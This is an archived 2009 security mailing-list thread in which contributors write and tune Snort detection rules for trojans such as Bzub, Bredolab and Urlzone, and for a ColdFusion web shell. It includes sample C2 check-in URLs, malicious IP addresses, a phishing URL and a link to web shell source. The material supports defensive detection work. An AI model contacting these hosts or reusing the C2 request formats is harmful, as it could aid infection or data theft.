reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_W32Agent.dsi; sid:2002792; rev:4;) This Bzub/Bzup/Cimuz/Tanspy sample appears to be an evolution of what the above rule was looking for: http://www.threatexpert.com/report.aspx?md5=09680948ce5164b96f6d48b23527c352 r.php?ver=2.6.17&lg=US&phid=0A5F16C521D34ABAAF9D31C6A058759A13ECEC591E644FF1AA699AB37F5F10C6&r=1241947041 If we decouple the 'phid' parameter from the start of the query string it will work better. 
I don't have complete payload (or pcap, or sample) so it's possible the user-agent will be too restrictive. Fix up the old rule or go with a new one?

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity"; flow:established,to_server; uricontent:"ver="; nocase; uricontent:"&lg="; nocase; uricontent:"&phid="; nocase; uricontent:"&r="; classtype:trojan-activity; sid:XXXXXXX; rev:1;)

--
Darren Spruell
phatbuckett at gmail.com

From jonkman at jonkmans.com Wed May 13 12:24:06 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 13 May 2009 12:24:06 -0400
Subject: [Emerging-Sigs] Bzub/Cimuz/Tanspy rule alteration/addition
In-Reply-To: <839aec700905130854n16622eefj5ccf2b2a71ceb115@mail.gmail.com>
References: <839aec700905130854n16622eefj5ccf2b2a71ceb115@mail.gmail.com>
Message-ID: <4A0AF426.7010408@jonkmans.com>

Good catch Darren! I'll modify the old rule, and to make sure add a pcre for the phid field. Looks hex and has a long length. That should be quite unique.

Matt

Darren Spruell wrote:
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Win32.Agent Reporting User Activity"; flow:established,to_server; uricontent:".php?phid="; nocase; uricontent:"&ver="; nocase; uricontent:"&lg="; nocase; pcre:"/User-Agent\:[^\n]+z/i"; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2002792; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_W32Agent.dsi; sid:2002792; rev:4;)
>
> This Bzub/Bzup/Cimuz/Tanspy sample appears to be an evolution of what the above rule was looking for:
>
> http://www.threatexpert.com/report.aspx?md5=09680948ce5164b96f6d48b23527c352
>
> r.php?ver=2.6.17&lg=US&phid=0A5F16C521D34ABAAF9D31C6A058759A13ECEC591E644FF1AA699AB37F5F10C6&r=1241947041
>
> If we decouple the 'phid' parameter from the start of the query string it will work better.
> I don't have complete payload (or pcap, or sample) so it's possible the user-agent will be too restrictive. Fix up the old rule or go with a new one?
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity"; flow:established,to_server; uricontent:"ver="; nocase; uricontent:"&lg="; nocase; uricontent:"&phid="; nocase; uricontent:"&r="; classtype:trojan-activity; sid:XXXXXXX; rev:1;)

From phatbuckett at gmail.com Wed May 13 12:03:38 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Wed, 13 May 2009 09:03:38 -0700
Subject: [Emerging-Sigs] BManager communication
Message-ID: <839aec700905130903j772857fcwdcf65406f5c881ef@mail.gmail.com>

Looks to be a downloader communicating with backend management kit, characteristic URLs:

hXXp://websitecheck.cn/nr/controller.php?action=bot&entity_list=&uid=&first=1&guid=5421361321&rnd=874493
hXXp://turokgame.cn/bm/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3858361321&rnd=923635
hXXp://78.109.29.112/new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3970894049&rnd=981633

Related (later stage)

hXXp://78.109.29.112/new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1239013921:unique_start;1239013932:unique_start;1239013964:unique_start;1239022982:unique_start;1239024633:unique_start;1239875139:unique_start

http://www.threatexpert.com/report.aspx?md5=ffe09f9b2470575727ea72bcb3ebce0a

Microsoft calls it Bredolab, others some variant of Downloader. Sorry, no pcaps/samples.
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN BManager downloader communication with controller (1)"; flow:established,to_server; uricontent:"action="; nocase; uricontent:"&entity_list="; nocase; uricontent:"&uid="; nocase; uricontent:"&first="; uricontent:"&guid="; nocase; uricontent:"&rnd="; nocase; classtype:trojan-activity; sid:XXXXXXX; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN BManager downloader communication with controller (2)"; flow:established,to_server; uricontent:"action="; nocase; uricontent:"&guid="; nocase; uricontent:"&rnd="; nocase; uricontent:"&uid="; nocase; uricontent:"&entity="; nocase; classtype:trojan-activity; sid:XXXXXXX; rev:1;)

--
Darren Spruell
phatbuckett at gmail.com

From jonkman at jonkmans.com Wed May 13 13:01:33 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 13 May 2009 13:01:33 -0400
Subject: [Emerging-Sigs] adjustment to 2009345
In-Reply-To: <4A0AE734.8080507@jonkmans.com>
References: <20090513080227.rzqjlq1d8gw8w4ww@mail.afferentsecurity.com> <4A0AE734.8080507@jonkmans.com>
Message-ID: <4A0AFCED.5060703@jonkmans.com>

I see now, have a similar situation. Added a threshold, pushing it out now.

Thanks Jack!

matt

Matt Jonkman wrote:
> How about we go the other way and have a threshold. Like 5 hits to trip it in 2 minutes.
>
> Would that eliminate the ntlm default tried you are seeing?
>
> matt
>
> Jack Pepper wrote:
>> it needs a limit threshold for those cases where NTLM is in use:
>>
>> alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any (msg:"ET ATTACK-RESPONSE HTTP 401 Unauthorized"; flow:from_server,established; content:"HTTP/1."; depth:7; content:" 401"; within:5; classtype:attempted-recon; reference:url,doc.emergingthreats.net/2009345; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized; sid:2009345; rev:3; threshold: type limit, track by_src, seconds 1200, count 1;)
>>
>> jp

From emerging at emergingthreats.net Wed May 13 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Wed, 13 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090513200011.22A3C4504D@goliath.jonkmans.com>

[***] Results from Oinkmaster started Wed May 13 16:00:11 2009 [***]

[+++] Added rules: [+++]

2002920 - ET POLICY VNC Authentication Failure (emerging-policy.rules)
2002922 - ET POLICY VNC Authentication Successful (emerging-policy.rules)
2009349 - ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity (emerging-virus.rules)
2009350 - ET TROJAN Win32.Hupigon Control Server Response (emerging-virus.rules)

[///] Modified active rules: [///]

2009345 - ET ATTACK-RESPONSE HTTP 401 Unauthorized (emerging-attack_response.rules)

[---] Removed rules: [---]

2002792 - ET TROJAN Win32.Agent Reporting User Activity (emerging-virus.rules)
2002920 - ET POLICY VNC Authentication Failure (emerging-exploit.rules)
2002922 - ET POLICY VNC Authentication Successful (emerging-exploit.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-exploit.rules (2):
#This is a good auth back from the server, in 2002922 in the policy ruleset
#this is for a server saying auth failed, in 2002920 in the policy ruleset

-> Added to emerging-policy.rules (1):
#part of the state machine sigs in EXPLOIT/RealVNC

-> Added to emerging-sid-msg.map (4):
2009349 || ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity
2009350 || ET TROJAN Win32.Hupigon Control Server Response
2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

-> Added to emerging-sid-msg.map.txt (4):
2009349 || ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity
2009350 || ET TROJAN Win32.Hupigon Control Server Response
2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

-> Added to emerging-virus.rules (1):
#by shirkdog

[---] Removed non-rule lines: [---]

-> Removed from emerging-exploit.rules (2):
#This is a good auth back from the server
#this is for a server saying auth failed

-> Removed from emerging-sid-msg.map (1):
2002792 || ET TROJAN Win32.Agent Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_W32Agent.dsi || url,doc.emergingthreats.net/2002792

-> Removed from emerging-sid-msg.map.txt (1):
2002792 || ET TROJAN Win32.Agent Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_W32Agent.dsi || url,doc.emergingthreats.net/2002792

-> Removed from emerging-virus.rules (1):
#By Tom Fischer

From frank at knobbe.us Wed May 13 17:53:36 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 13 May 2009 16:53:36 -0500
Subject: [Emerging-Sigs] adjustment to 2009345
In-Reply-To: <4A0AFCED.5060703@jonkmans.com>
References: <20090513080227.rzqjlq1d8gw8w4ww@mail.afferentsecurity.com> <4A0AE734.8080507@jonkmans.com> <4A0AFCED.5060703@jonkmans.com>
Message-ID: <1242251616.21400.12.camel@localhost>

On Wed, 2009-05-13 at 13:01 -0400, Matt Jonkman wrote:
> I see now, have a similar situation. Added a threshold, pushing it out now.

Jack, stop confusing Matt! With that added threshold, the rule (2009345) is now identical to (2009346)!

I think the original idea was that if you don't want an alert on every packet, don't enable SID 2009345 and use 2009346 instead.

-Frank

From pepperjack at afferentsecurity.com Wed May 13 18:09:34 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Wed, 13 May 2009 17:09:34 -0500
Subject: [Emerging-Sigs] adjustment to 2009345
In-Reply-To: <1242251616.21400.12.camel@localhost>
References: <20090513080227.rzqjlq1d8gw8w4ww@mail.afferentsecurity.com> <4A0AE734.8080507@jonkmans.com> <4A0AFCED.5060703@jonkmans.com> <1242251616.21400.12.camel@localhost>
Message-ID: <20090513170934.u41njf61cckw8kwo@mail.afferentsecurity.com>

Quoting Frank Knobbe :

> I think the original idea was that if you don't want an alert on every packet, don't enable SID 2009345 and use 2009346 instead.

I was of the opinion that 2009345 needed a "limit" threshold because it will generate thousands and thousands of identical alerts if a website uses NTLM. 2009346 has a "threshold" threshold as a way to detect brute force attacks. However, it is apparent that in an NTLM setting, 2009346 will always be indistinguishable from 2009345 and therefore redundant.
From frank at knobbe.us Wed May 13 18:23:42 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 13 May 2009 17:23:42 -0500
Subject: [Emerging-Sigs] adjustment to 2009345
In-Reply-To: <20090513170934.u41njf61cckw8kwo@mail.afferentsecurity.com>
References: <20090513080227.rzqjlq1d8gw8w4ww@mail.afferentsecurity.com> <4A0AE734.8080507@jonkmans.com> <4A0AFCED.5060703@jonkmans.com> <1242251616.21400.12.camel@localhost> <20090513170934.u41njf61cckw8kwo@mail.afferentsecurity.com>
Message-ID: <1242253422.21400.33.camel@localhost>

On Wed, 2009-05-13 at 17:09 -0500, Jack Pepper wrote:
> Quoting Frank Knobbe :
>
>> I think the original idea was that if you don't want an alert on every packet, don't enable SID 2009345 and use 2009346 instead.
>
> I was of the opinion that 2009345 needed a "limit" threshold because it will generate thousands and thousands of identical alerts if a website uses NTLM.

I can see that. Then Matt needs to fix the rule by changing the threshold back to limit :)

I don't think that sig is all that useful. I have yet to catch anything malicious with that. However, access to Outlook web mail, and access from Blackberry devices trigger frequently (with a threshold of 30 in 60). Not really an actionable sig. I'm gonna give it another week before I remove it from my set :)

-Frank
From phatbuckett at gmail.com Thu May 14 09:12:06 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Thu, 14 May 2009 06:12:06 -0700
Subject: [Emerging-Sigs] Urlzone/Bebloh sig
Message-ID: <839aec700905140612qc6f65f7v790477d6d6ae4b86@mail.gmail.com>

alert tcp $HOME_NET 1024: -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Urlzone/Bebloh Communication with Controller"; flow:established,to_server; content:"GET "; depth:4; uricontent:"get.php?type=slg&id="; nocase; classtype:trojan-activity; reference:url,threatinfo.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_BEBLOH.KO&VSect=Td; sid:XXXXXXX; rev:1;)

Urlzone/Bebloh is another banker/infostealer typically targeting German banks.

Typical C&C communication looks like requests to:

somedomain.tld/IT02/get.php?type=slg&id=ZLYER3I3REZASOKGSO

Every report I've seen makes it look like /get.php is so far very static as well as the value of the 'type' parameter during C&C communication. Also appears that /IT0%d/ varies a bit but for now always uses /IT0\d/ so maybe it can be tightened a bit more if needed with a URI pcre.

Would be interested to know if this is successful for anyone.

--
Darren Spruell
phatbuckett at gmail.com

From paul.edwards at kindsight.net Thu May 14 09:25:18 2009
From: paul.edwards at kindsight.net (Paul Edwards)
Date: Thu, 14 May 2009 09:25:18 -0400
Subject: [Emerging-Sigs] seeing lots of hits on ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/5.0) sid: 2009295
In-Reply-To: <49F5AFD2.8090901@jonkmans.com>
References: <49F5AFD2.8090901@jonkmans.com>
Message-ID:

Excuse the delay... I am seeing significant hits on this as well. For some reason the client is sending an http post back to: 98.136.113.173 in my case.
Seems like an embedded tool of some sort (like toolbar or vista sidebar gadget). The thing that's strange is the IP is hardcoded.

Paul

-----Original Message-----
From: emerging-sigs-bounces at emergingthreats.net [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Matt Jonkman
Sent: Monday, April 27, 2009 9:15 AM
To: Russell Fulton
Cc: Emerging Threats Signatures
Subject: Re: [Emerging-Sigs] seeing lots of hits on ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/5.0) sid: 2009295

Hmmm, as far as I know it's not a valid user-agent as I'm not aware of a mozilla 5 spec. There's an html 5 spec coming around. Perhaps that's what these folks are intending to signify.

Anyone else seeing similar false positives? If so we'll have to drop the sig I suspect.

Thanks Russell!

Matt

Russell Fulton wrote:
> Seeing quite a lot of machines triggering this alert when visiting 68.180.216.31 vcs1.msg.vip.sp1.yahoo.com or 76.13.14.40 vcs2.msg.vip.ac4.yahoo.com.
>
> Also saw one machine with 400 odd hits against a local airline booking site but nothing else.
>
> Count: 3(300) rows returned
> Time Window for this screen: Mon Apr 27 10:25:45 2009 to Mon Apr 27 10:53:46 2009
>
> Src | Sig name | Total | Events | Proto
> 162.112.18.100 flightbookings.airnewzealand.co.nz | ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/5.0) | 455 | 6
> 68.180.216.31 vcs1.msg.vip.sp1.yahoo.com | ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/5.0) | 24 | 6
> 76.13.14.40 vcs2.msg.vip.ac4.yahoo.com | ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/5.0) | 18 | 6
>
> Some of the machines these alerts come from I know to be very well managed and looked after.
>
> So it would appear that some legit things use this user-agent string.
>
> Russell
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

From jonkman at jonkmans.com Thu May 14 09:34:28 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 14 May 2009 09:34:28 -0400
Subject: [Emerging-Sigs] Urlzone/Bebloh sig
In-Reply-To: <839aec700905140612qc6f65f7v790477d6d6ae4b86@mail.gmail.com>
References: <839aec700905140612qc6f65f7v790477d6d6ae4b86@mail.gmail.com>
Message-ID: <4A0C1DE4.5030702@jonkmans.com>

Got it Darren, good sig. You're really at it this week, thanks!

Posting now.

matt

Darren Spruell wrote:
> alert tcp $HOME_NET 1024: -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Urlzone/Bebloh Communication with Controller"; flow:established,to_server; content:"GET "; depth:4; uricontent:"get.php?type=slg&id="; nocase; classtype:trojan-activity; reference:url,threatinfo.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_BEBLOH.KO&VSect=Td; sid:XXXXXXX; rev:1;)
>
> Urlzone/Bebloh is another banker/infostealer typically targeting German banks.
>
> Typical C&C communication looks like requests to:
>
> somedomain.tld/IT02/get.php?type=slg&id=ZLYER3I3REZASOKGSO
>
> Every report I've seen makes it look like /get.php is so far very static as well as the value of the 'type' parameter during C&C communication. Also appears that /IT0%d/ varies a bit but for now always uses /IT0\d/ so maybe it can be tightened a bit more if needed with a URI pcre.
>
> Would be interested to know if this is successful for anyone.

From jonkman at jonkmans.com Thu May 14 09:47:31 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 14 May 2009 09:47:31 -0400
Subject: [Emerging-Sigs] adjustment to 2009345
In-Reply-To: <1242253422.21400.33.camel@localhost>
References: <20090513080227.rzqjlq1d8gw8w4ww@mail.afferentsecurity.com> <4A0AE734.8080507@jonkmans.com> <4A0AFCED.5060703@jonkmans.com> <1242251616.21400.12.camel@localhost> <20090513170934.u41njf61cckw8kwo@mail.afferentsecurity.com> <1242253422.21400.33.camel@localhost>
Message-ID: <4A0C20F3.1040707@jonkmans.com>

I think it'll be useful, but it should be a limit I think. Maybe a both.

Can't believe how many technologies rely on constant auth denials. All day sitting there getting denied. Lovely design there.

Changing the threshold to something more useful.

Matt

Frank Knobbe wrote:
> On Wed, 2009-05-13 at 17:09 -0500, Jack Pepper wrote:
>> Quoting Frank Knobbe :
>>
>>> I think the original idea was that if you don't want an alert on every packet, don't enable SID 2009345 and use 2009346 instead.
>>
>> I was of the opinion that 2009345 needed a "limit" threshold because it will generate thousands and thousands of identical alerts if a website uses NTLM.
>
> I can see that.
> Then Matt needs to fix the rule by changing the threshold back to limit :)
>
> I don't think that sig is all that useful. I have yet to catch anything malicious with that. However, access to Outlook web mail, and access from Blackberry devices trigger frequently (with a threshold of 30 in 60). Not really an actionable sig. I'm gonna give it another week before I remove it from my set :)
>
> -Frank

From mtombaugh at agilentcorp.com Thu May 14 12:08:10 2009
From: mtombaugh at agilentcorp.com (Mark Tombaugh)
Date: Thu, 14 May 2009 12:08:10 -0400
Subject: [Emerging-Sigs] godaddy name server collateral damagement
Message-ID: <1242317290.22323.3554.camel@gnub>

Are ns21.domaincontrol.com and ns22.domaincontrol.com really compromised? If so, what's the scoop?
http://www.emergingthreats.net/rules/emerging-compromised.rules

From pepperjack at afferentsecurity.com Thu May 14 12:24:40 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Thu, 14 May 2009 11:24:40 -0500
Subject: [Emerging-Sigs] godaddy name server collateral damagement
In-Reply-To: <1242317290.22323.3554.camel@gnub>
References: <1242317290.22323.3554.camel@gnub>
Message-ID: <20090514112440.629q7sw3ggc4w4cs@mail.afferentsecurity.com>

I am not sure if it's related, but I found this little tidbit while dissecting a zeus infection:

This host goes to "godaddy":
http://www.find-assist.com/search?qg=%20/bnt/bnt.php?zip=Dhh637cd11_0630db15&type=1&name=16843008&q=bnt&item=0&id=0&rdp=0&ref=0&rn=1DGFqqW2QriutQ6&rg=

This host goes to a fake yahoo phishing site:
http://wwwwp.find-assist.com/search?qg=%20/bnt/bnt.php?zip=Dhh637cd11_0630db15&type=1&name=16843008&q=bnt&item=0&id=0&rdp=0&ref=0&rn=1DGFqqW2QriutQ6&rg=

All the variants I tried for www[a-z]+.find-assist.com resolved to the same godaddy site, except wwwwp.find-assist.com.

Interesting, eh?

jp

Quoting Mark Tombaugh :
> Are ns21.domaincontrol.com and ns22.domaincontrol.com really compromised? If so, what's the scoop?
>
> http://www.emergingthreats.net/rules/emerging-compromised.rules
From jonkman at jonkmans.com Thu May 14 12:31:41 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 14 May 2009 12:31:41 -0400
Subject: [Emerging-Sigs] godaddy name server collateral damagement
In-Reply-To: <20090514112440.629q7sw3ggc4w4cs@mail.afferentsecurity.com>
References: <1242317290.22323.3554.camel@gnub> <20090514112440.629q7sw3ggc4w4cs@mail.afferentsecurity.com>
Message-ID: <4A0C476D.5010706@jonkmans.com>

Those domaincontrol hosts were listed because they are active Waledac controllers. Surely compromised or fraudulent hosting accounts. As listed at Sudosecure.

I'll report them to Godaddy and I'm sure they'll drop them quickly. They'll then drop out of the compromised list tonight.

Matt

Jack Pepper wrote:
> I am not sure if it's related, but I found this little tidbit while dissecting a zeus infection:
>
> This host goes to "godaddy":
> http://www.find-assist.com/search?qg=%20/bnt/bnt.php?zip=Dhh637cd11_0630db15&type=1&name=16843008&q=bnt&item=0&id=0&rdp=0&ref=0&rn=1DGFqqW2QriutQ6&rg=
>
> This host goes to a fake yahoo phishing site:
> http://wwwwp.find-assist.com/search?qg=%20/bnt/bnt.php?zip=Dhh637cd11_0630db15&type=1&name=16843008&q=bnt&item=0&id=0&rdp=0&ref=0&rn=1DGFqqW2QriutQ6&rg=
>
> All the variants I tried for www[a-z]+.find-assist.com resolved to the same godaddy site, except wwwwp.find-assist.com.
>
> Interesting, eh?
>
> jp
>
> Quoting Mark Tombaugh :
>
>> Are ns21.domaincontrol.com and ns22.domaincontrol.com really compromised? If so, what's the scoop?
>> >> http://www.emergingthreats.net/rules/emerging-compromised.rules >> >> >> _______________________________________________ >> Emerging-sigs mailing list >> Emerging-sigs at emergingthreats.net >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >> > > > -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From eoin.miller at trojanedbinaries.com Thu May 14 14:58:19 2009 From: eoin.miller at trojanedbinaries.com (Eoin Miller) Date: Thu, 14 May 2009 14:58:19 -0400 Subject: [Emerging-Sigs] ColdFusion Directory Browser Message-ID: <4A0C69CB.4090107@trojanedbinaries.com> After a recent incident at a client site, we had extracted a ColdFusion directory browser that was uploaded and used: http://trojanedbinaries.com/security/cfdirectorybrowser.txt We found the same code in the wild located here: http://www.b3ta.cr3ation.co.uk/onsite/cfm/7534.tmpfiles.cfm After some head scratching when looking at the traffic, we noticed the CF directory browser actually sets the "Content-Type" delivered back to the client as "unknown:security.breach" when the attacker uses the directory browser to download a file: --snip-- --snip-- This causes responses to file download requests to contain the following HTTP headers: --snip-- HTTP/1.1 200 OK Date: Server: Content-Type: unknown:security.breach Transfer-Encoding: chunked Connection: keep-alive --snip-- Using this, we developed a very simple signature to look for this content type to generate alerts: alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any (msg:"DEVELOPMENT ColdFusion Directory Browser File Read"; content:"content-type\: unknown\:security.breach"; nocase; sid:20080514; rev:0;) We are going to look into some further analysis of the commands in the URI that are passed to the CF directory browser (DirPath|deletefile) and also 
what the contents of a POST to the CF directory browser look like. So far nothing unique enough stands out besides the "Content-Type" when a file is actually downloaded. If anyone else would like to look into this more who has free cycles and more skill, we would be grateful. This is my first communication on the list, so also, hello all. :) -- Eoin Miller eoin.miller at trojanedbinaries.com From emerging at emergingthreats.net Thu May 14 16:00:10 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Thu, 14 May 2009 16:00:10 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090514200010.ADE094504D@goliath.jonkmans.com> [***] Results from Oinkmaster started Thu May 14 16:00:10 2009 [***] [+++] Added rules: [+++] 2009351 - ET TROJAN Urlzone/Bebloh Communication with Controller (emerging-virus.rules) [///] Modified active rules: [///] 2009345 - ET ATTACK-RESPONSE HTTP 401 Unauthorized (emerging-attack_response.rules) 2009346 - ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack (emerging-attack_response.rules) 2009347 - ET TROJAN Tigger.a/Syzor Checkin (emerging-virus.rules) 2009348 - ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan (emerging.rules) 2009349 - ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity (emerging-virus.rules) 2009350 - ET TROJAN Win32.Hupigon Control Server Response (emerging-virus.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (15): 2009347 || ET TROJAN Tigger.a/Syzor Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Tigger || url,doc.emergingthreats.net/2009347 2009348 || ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Worldpay || url,doc.emergingthreats.net/2009348 || url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/ 2009349 || ET TROJAN Bzub/Cimuz/Tanspy 
Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bzub || url,doc.emergingthreats.net/2009349
2009350 || ET TROJAN Win32.Hupigon Control Server Response || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Hupington || url,doc.emergingthreats.net/2009350
2009351 || ET TROJAN Urlzone/Bebloh Communication with Controller || url,threatinfo.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_BEBLOH.KO&VSect=Td
2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

[---] Removed non-rule lines: [---]

-> Removed from emerging-sid-msg.map (4):
2009347 || ET TROJAN Tigger.a/Syzor Checkin
2009348 || ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan || url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/
2009349 || ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity
2009350 || ET TROJAN Win32.Hupigon Control Server Response

From r.fulton at auckland.ac.nz Thu May 14 19:57:53 2009
From: r.fulton at auckland.ac.nz (Russell Fulton)
Date: Fri, 15 May 2009 11:57:53 +1200
Subject: [Emerging-Sigs] FP for ET TROJAN Downloader.Affill User Agent Detected (lol) Sig ID 2003642
Message-ID:

Will trigger on any user-agent string that *starts* with 'lol'. Need a space on the end of the string?

Russell

DATA
--------
GET /lolcats/randomImage.php HTTP/1.1..User-Agent: LOLCatsFr
ee/1.4 CFNetwork/342.1 Darwin/9.4.1..Accept: */*..Accept-Lan
guage: en-us..Accept-Encoding: gzip, deflate..Connection: ke
ep-alive..Host: www.greenrobot.com....
From jonkman at jonkmans.com Fri May 15 10:19:11 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 15 May 2009 10:19:11 -0400
Subject: [Emerging-Sigs] FP for ET TROJAN Downloader.Affill User Agent Detected (lol) Sig ID 2003642
In-Reply-To:
References:
Message-ID: <4A0D79DF.8010604@jonkmans.com>

Got it, thanks Russell. Actually I dropped the sig. There hasn't been a hit on lol, nor another strain we've seen use that. If it crops back up we'll put something in.

Thanks!

Matt

Russell Fulton wrote:
> Will trigger on any user-agent string that *starts* with 'lol'. Need
> a space on the end of the string?
>
> Russell
>
> DATA
> --------
> GET /lolcats/randomImage.php HTTP/1.1..User-Agent: LOLCatsFr
> ee/1.4 CFNetwork/342.1 Darwin/9.4.1..Accept: */*..Accept-Lan
> guage: en-us..Accept-Encoding: gzip, deflate..Connection: ke
> ep-alive..Host: www.greenrobot.com....
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From flamdugen at hotmail.com Fri May 15 10:51:03 2009
From: flamdugen at hotmail.com (John Jacobs)
Date: Fri, 15 May 2009 09:51:03 -0500
Subject: [Emerging-Sigs] For rule inclusion/review; ISC Google & Twitter ET Sigs
Message-ID:

From flamdugen at hotmail.com Fri May 15 10:58:24 2009
From: flamdugen at hotmail.com (John Jacobs)
Date: Fri, 15 May 2009 09:58:24 -0500
Subject: [Emerging-Sigs] Second Try; For review; ISC/Twitter/Google ET Sigs
Message-ID:

From jonkman at jonkmans.com Fri May 15 11:03:38 2009
